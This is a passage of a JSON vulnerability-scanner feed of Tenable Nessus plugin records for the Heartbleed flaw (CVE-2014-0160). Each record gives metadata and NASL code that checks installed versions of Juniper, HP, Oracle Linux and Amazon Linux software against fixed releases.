or an Affiliate thereof.\");\n\n script_dependencies(\"tenable_ot_api_integration.nasl\");\n script_require_keys(\"Tenable.ot/Siemens\");\n\n exit(0);\n}\n\n\ninclude('tenable_ot_cve_funcs.inc');\n\nget_kb_item_or_exit('Tenable.ot/Siemens');\n\nvar asset = tenable_ot::assets::get(vendor:'Siemens');\n\nvar vuln_cpes = {\n \"cpe:/o:siemens:simatic_s7-1500_firmware:1.5\" :\n {\"versionEndIncluding\" : \"1.5\", \"versionStartIncluding\" : \"1.5\"},\n \"cpe:/o:siemens:simatic_s7-1500t_firmware:1.5\" :\n {\"versionEndIncluding\" : \"1.5\", \"versionStartIncluding\" : \"1.5\"}\n};\n\ntenable_ot::cve::compare_and_report(asset:asset, cpes:vuln_cpes, severity:SECURITY_WARNING);\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-05-21T15:03:30", "description": "According to its self-reported version, the version of IVE / UAC OS running on the remote host is affected by an information disclosure vulnerability.\n\nAn out-of-bounds read error, known as the 'Heartbleed Bug', exists related to handling TLS heartbeat extensions that could allow an attacker to obtain sensitive information such as primary key material, secondary key material, and other protected content.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-04-18T00:00:00", "type": "nessus", "title": "Junos Pulse Secure Access IVE / UAC OS OpenSSL Heartbeat Information Disclosure (JSA10623) (Heartbleed)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2022-05-05T00:00:00", "cpe": ["cpe:/o:juniper:ive_os", "cpe:/a:juniper:junos_pulse_secure_access_service", "cpe:/a:juniper:junos_pulse_access_control_service"], "id": "JUNOS_PULSE_JSA10623.NASL", "href": "https://www.tenable.com/plugins/nessus/73688", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73688);\n script_version(\"1.15\");\n 
script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/05\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"CERT\", value:\"720951\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n script_xref(name:\"EDB-ID\", value:\"32791\");\n script_xref(name:\"EDB-ID\", value:\"32998\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/25\");\n\n script_name(english:\"Junos Pulse Secure Access IVE / UAC OS OpenSSL Heartbeat Information Disclosure (JSA10623) (Heartbleed)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by an information disclosure\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the version of IVE / UAC OS\nrunning on the remote host is affected by an information disclosure\nvulnerability.\n\nAn out-of-bounds read error, known as the 'Heartbleed Bug', exists\nrelated to handling TLS heartbeat extensions that could allow an\nattacker to obtain sensitive information such as primary key material,\nsecondary key material, and other protected content.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.juniper.net/InfoCenter/index?page=content&id=KB29004\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.juniper.net/InfoCenter/index?page=content&id=KB29007\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10623\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.heartbleed.com\");\n script_set_attribute(attribute:\"see_also\", value:\"https://eprint.iacr.org/2014/140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n 
script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Juniper Junos IVE OS version 7.4R9.3 / 8.0R3.2 or later or\nUAC OS version 4.4R10 / 5.0R3.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:juniper:ive_os\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:juniper:junos_pulse_secure_access_service\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:juniper:junos_pulse_access_control_service\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Juniper/IVE OS/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit('Host/Juniper/IVE OS/Version');\nmatch = eregmatch(string:version, pattern:\"^([\\d.]+)[Rr]([0-9.]+)\");\nif (isnull(match)) exit(1, 'Error parsing version: ' + version);\n\nrelease = match[1];\nbuild = match[2];\n\n# IVE OS\n# 7.4R1 to 7.4R9\nif (release == '7.4' && ver_compare(ver:build, fix:'9.3', strict:FALSE) == -1)\n fix = '7.4r9.3';\n# 8.0R1 to 8.0R3\nelse if (release == '8.0' && ver_compare(ver:build, fix:'3.2', strict:FALSE) == -1)\n fix = '8.0r3.2';\n\n# UAC OS\n# 4.4R1 to 4.4R9\nelse if (release == '4.4' && ver_compare(ver:build, fix:'10', strict:FALSE) == -1)\n fix = '4.4r10';\n# 5.0R1 to 5.0R3\nelse if (release == '5.0' && ver_compare(ver:build, fix:'3.2', strict:FALSE) == -1)\n fix = '5.0r3.2';\n\nelse\n audit(AUDIT_INST_VER_NOT_VULN, 'IVE/UAC OS', version);\n\nif (report_verbosity > 0)\n{\n report =\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix + '\\n';\n security_warning(port:0, extra:report);\n}\nelse security_warning(0);\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-05-21T15:22:26", "description": "The RPM installation of HP Version Control Agent (VCA) on the remote Linux host is version 7.2.2, 7.3.0, or 7.3.1. 
It is, therefore, affected by an information disclosure vulnerability.\n\nAn out-of-bounds read error, known as the 'Heartbleed Bug', exists related to handling TLS heartbeat extensions that could allow an attacker to obtain sensitive information such as primary key material, secondary key material, and other protected content.", "cvss3": {"score": null, "vector": null}, "published": "2014-08-06T00:00:00", "type": "nessus", "title": "HP Version Control Agent (VCA) Heartbeat Information Disclosure (Heartbleed)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2022-05-05T00:00:00", "cpe": ["cpe:/a:hp:version_control_agent"], "id": "HP_VCA_SSRT101531-SLES.NASL", "href": "https://www.tenable.com/plugins/nessus/77023", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77023);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/05\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"CERT\", value:\"720951\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n script_xref(name:\"EDB-ID\", value:\"32791\");\n script_xref(name:\"EDB-ID\", value:\"32998\");\n script_xref(name:\"HP\", value:\"emr_na-c04262472\");\n script_xref(name:\"HP\", value:\"HPSBMU03020\");\n script_xref(name:\"HP\", value:\"SSRT101531\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/25\");\n\n script_name(english:\"HP Version Control Agent (VCA) Heartbeat Information Disclosure (Heartbleed)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains software that is affected by an information\ndisclosure vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The RPM installation of HP Version Control Agent (VCA) on the remote\nLinux host is version 7.2.2, 7.3.0, or 7.3.1. 
It is, therefore,\naffected by an information disclosure vulnerability.\n\nAn out-of-bounds read error, known as the 'Heartbleed Bug', exists\nrelated to handling TLS heartbeat extensions that could allow an\nattacker to obtain sensitive information such as primary key material,\nsecondary key material, and other protected content.\");\n # https://h20565.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04262472\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9ffb6dc\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.heartbleed.com\");\n script_set_attribute(attribute:\"see_also\", value:\"https://eprint.iacr.org/2014/140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VCA 7.3.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:version_control_agent\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n 
script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^SLES\") audit(AUDIT_OS_NOT, \"SuSE Linux Enterprise Server\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\n# These are the only versions the software is supported\n# however you can install it on later versions. So\n# only check non-supported versions if paranoia is on.\nif (\n report_paranoia < 2 &&\n !ereg(pattern:\"SLES(8|9|10|11)($|[^0-9])\", string:release)\n) audit(AUDIT_OS_NOT, \"SuSE Linux Enterprise Server 8 / 9 / 10 / 11\");\n\nrpms = get_kb_item_or_exit(\"Host/SuSE/rpm-list\");\nif (\"hpvca-\" >!< rpms) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"HP Version Control Agent\");\n\n# Get the RPM version\nmatch = eregmatch(string:rpms, pattern:\"(^|\\n)hpvca-(\\d+\\.\\d+\\.\\d+-\\d+)\");\nif (isnull(match)) audit(AUDIT_VER_FAIL, \"HP Version Control Agent\");\n\nversion = match[2];\nversion = ereg_replace(string:version, replace:\".\", pattern:\"-\");\n\nfix = \"7.3.2.0\";\n\n# These specific version lines are affected\nif (\n version =~ \"^7\\.2\\.2\\.\" ||\n version =~ \"^7\\.3\\.[0-1]\\.\"\n)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n}\nelse 
audit(AUDIT_PACKAGE_NOT_AFFECTED, \"HP Version Control Agent\");\n", "cvss": {"score": 9.4, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:N"}}, {"lastseen": "2022-05-21T15:22:46", "description": "The version of HP LoadRunner installed on the remote host is 11.52.x prior to 11.52 Patch 2 or 12.00.x prior to 12.00 Patch 1. It is, therefore, affected by an out-of-bounds read error, known as the 'Heartbleed Bug' in the included OpenSSL version.\n\nThis error is related to handling TLS heartbeat extensions that could allow an attacker to obtain sensitive information such as primary key material, secondary key material, and other protected content.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-08-07T00:00:00", "type": "nessus", "title": "HP LoadRunner 11.52.x < 11.52 Patch 2 / 12.00.x < 12.00 Patch 1 Heartbeat Information Disclosure (Heartbleed)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2022-05-05T00:00:00", "cpe": ["cpe:/a:hp:loadrunner"], "id": "HP_LOADRUNNER_12_00_1.NASL", "href": "https://www.tenable.com/plugins/nessus/77054", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77054);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/05\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"CERT\", value:\"720951\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n script_xref(name:\"EDB-ID\", value:\"32791\");\n script_xref(name:\"EDB-ID\", value:\"32998\");\n script_xref(name:\"HP\", value:\"HPSBMU03040\");\n script_xref(name:\"HP\", value:\"SSRT101565\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/25\");\n\n script_name(english:\"HP LoadRunner 11.52.x < 11.52 Patch 2 / 12.00.x < 12.00 Patch 1 Heartbeat Information Disclosure (Heartbleed)\");\n\n 
script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has an application that is affected by an\ninformation disclosure vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of HP LoadRunner installed on the remote host is 11.52.x\nprior to 11.52 Patch 2 or 12.00.x prior to 12.00 Patch 1. It is,\ntherefore, affected by an out-of-bounds read error, known as the\n'Heartbleed Bug' in the included OpenSSL version.\n\nThis error is related to handling TLS heartbeat extensions that could\nallow an attacker to obtain sensitive information such as primary key\nmaterial, secondary key material, and other protected content.\");\n # https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-c04286049\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c3b43466\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/532104/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.heartbleed.com\");\n script_set_attribute(attribute:\"see_also\", value:\"https://eprint.iacr.org/2014/140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to HP LoadRunner 11.52 Patch 2 / 12.00 Patch 1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n 
script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:loadrunner\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"hp_loadrunner_installed.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"installed_sw/HP LoadRunner\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('misc_func.inc');\ninclude(\"install_func.inc\");\n\napp_name = \"HP LoadRunner\";\ncutoff = NULL;\ncutoff2 = NULL;\nfixed = NULL;\nreport = NULL;\n\n# Only 1 install of the server is possible.\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\n\nversion = install['version'];\npath = install['path'];\nverui = install['display_version'];\n\n# Determine cutoff if affected branch.\n# 11.52.0 is 11.52.1323.0 or 11.52.1517.0\n# 12.00.0 is 12.00.661.0\nif (version =~ \"^11\\.52($|[^0-9])\")\n{\n cutoff = \"11.52.1323.0\";\n cutoff2 = \"11.52.1517.0\";\n}\nif (version =~ \"^12\\.00?($|[^0-9])\")\n{\n cutoff = \"12.0.661.0\";\n cutoff2 = \"12.0.661.0\";\n}\n\nif (isnull(cutoff)) audit(AUDIT_NOT_INST, app_name + \" 11.52.x / 12.0.x\");\n\nif (version >= cutoff && version <= 
cutoff2)\n{\n foreach file (make_list(\"ssleay32_101_x32.dll\", \"ssleay32_101_x64.dll\"))\n {\n dll_path = path + \"bin\\\" + file;\n res = hotfix_get_fversion(path:dll_path);\n err_res = hotfix_handle_error(\n error_code : res['error'],\n file : dll_path,\n appname : app_name,\n exit_on_fail : FALSE\n );\n if (err_res) continue;\n\n dll_ver = join(sep:'.', res['value']);\n break;\n }\n hotfix_check_fversion_end();\n\n if (empty_or_null(dll_ver))\n audit(\n AUDIT_VER_FAIL,\n \"ssleay32_101_x32.dll and ssleay32_101_x64.dll under \" + path + \"bin\\\"\n );\n\n fixed_dll_ver = '1.0.1.4';\n if (ver_compare(ver:dll_ver, fix:fixed_dll_ver, strict:FALSE) == -1)\n report =\n '\\n Path : ' + dll_path +\n '\\n Installed DLL version : ' + dll_ver +\n '\\n Fixed DLL version : ' + fixed_dll_ver +\n '\\n';\n}\n# If not at a patchable version, use ver_compare() and suggest\n# upgrade if needed; do not use cutoff2 - this will lead to\n# false positives.\nelse if (\n (\n cutoff =~ \"^11\\.\" &&\n ver_compare(ver:\"11.52\", fix:version, strict:FALSE) >= 0 &&\n ver_compare(ver:version, fix:cutoff, strict:FALSE) == -1\n )\n ||\n (\n cutoff =~ \"^12\\.\" &&\n ver_compare(ver:\"12.00\", fix:version, strict:FALSE) >= 0 &&\n ver_compare(ver:version, fix:cutoff, strict:FALSE) == -1\n )\n)\n{\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 11.52.1323.0 (11.52 Patch 2) / 12.0.661.0 (12.00 Patch 1)' +\n '\\n';\n}\n\nif (isnull(report)) audit(AUDIT_INST_PATH_NOT_VULN, app_name, verui, path);\n\nport = kb_smb_transport();\n\nif (report_verbosity > 0) security_warning(extra:report, port:port);\nelse security_warning(port);\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-05-21T15:03:29", "description": "From Red Hat Security Advisory 2014:0376 :\n\nUpdated openssl packages that fix one security issue are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this 
update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols, as well as a full-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled TLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server could send a specially crafted TLS or DTLS Heartbeat packet to disclose a limited portion of memory per request from a connected client or server. Note that the disclosed portions of memory could potentially include sensitive information such as private keys.\n(CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this issue. Upstream acknowledges Neel Mehta of Google Security as the original reporter.\n\nAll OpenSSL users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. 
For the update to take effect, all services linked to the OpenSSL library (such as httpd and other SSL-enabled services) must be restarted or the system rebooted.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-04-08T00:00:00", "type": "nessus", "title": "Oracle Linux 6 : openssl (ELSA-2014-0376)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2022-05-05T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:openssl", "p-cpe:/a:oracle:linux:openssl-devel", "p-cpe:/a:oracle:linux:openssl-perl", "p-cpe:/a:oracle:linux:openssl-static", "cpe:/o:oracle:linux:6"], "id": "ORACLELINUX_ELSA-2014-0376.NASL", "href": "https://www.tenable.com/plugins/nessus/73395", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2014:0376 and \n# Oracle Linux Security Advisory ELSA-2014-0376 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73395);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/05\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_xref(name:\"RHSA\", value:\"2014:0376\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/25\");\n\n script_name(english:\"Oracle Linux 6 : openssl (ELSA-2014-0376)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"From Red Hat Security Advisory 2014:0376 :\n\nUpdated openssl packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. 
A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL\nv2/v3) and Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled\nTLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS\nclient or server could send a specially crafted TLS or DTLS Heartbeat\npacket to disclose a limited portion of memory per request from a\nconnected client or server. Note that the disclosed portions of memory\ncould potentially include sensitive information such as private keys.\n(CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this\nissue. Upstream acknowledges Neel Mehta of Google Security as the\noriginal reporter.\n\nAll OpenSSL users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. 
For the update\nto take effect, all services linked to the OpenSSL library (such as\nhttpd and other SSL-enabled services) must be restarted or the system\nrebooted.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://oss.oracle.com/pipermail/el-errata/2014-April/004065.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected openssl packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'OpenSSL Heartbeat Information Leak');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssl-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssl-static\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, 
Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"openssl-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"openssl-devel-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"openssl-perl-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"openssl-static-1.0.1e-16.el6_5.7\")) flag++;\n\n\nif (flag)\n{\n report = rpm_report_get();\n\n if(!egrep(pattern:\"package installed.+openssl[^0-9]*\\-1\\.0\\.1\", string:report)) exit(0, \"The remote host does not use OpenSSL 1.0.1\");\n\n if (report_verbosity > 0) security_warning(port:0, extra:report);\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-05-21T15:04:07", "description": "A missing bounds check was found in the way OpenSSL handled TLS heartbeat extension packets. 
This flaw could be used to reveal up to 64k of memory from a connected client or server.", "cvss3": {"score": null, "vector": null}, "published": "2014-04-09T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : openssl Information Disclosure Vulnerability (ALAS-2014-320)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2022-05-05T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:openssl", "p-cpe:/a:amazon:linux:openssl-debuginfo", "p-cpe:/a:amazon:linux:openssl-devel", "p-cpe:/a:amazon:linux:openssl-perl", "p-cpe:/a:amazon:linux:openssl-static", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2014-320.NASL", "href": "https://www.tenable.com/plugins/nessus/73438", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2014-320.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73438);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/05\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_xref(name:\"ALAS\", 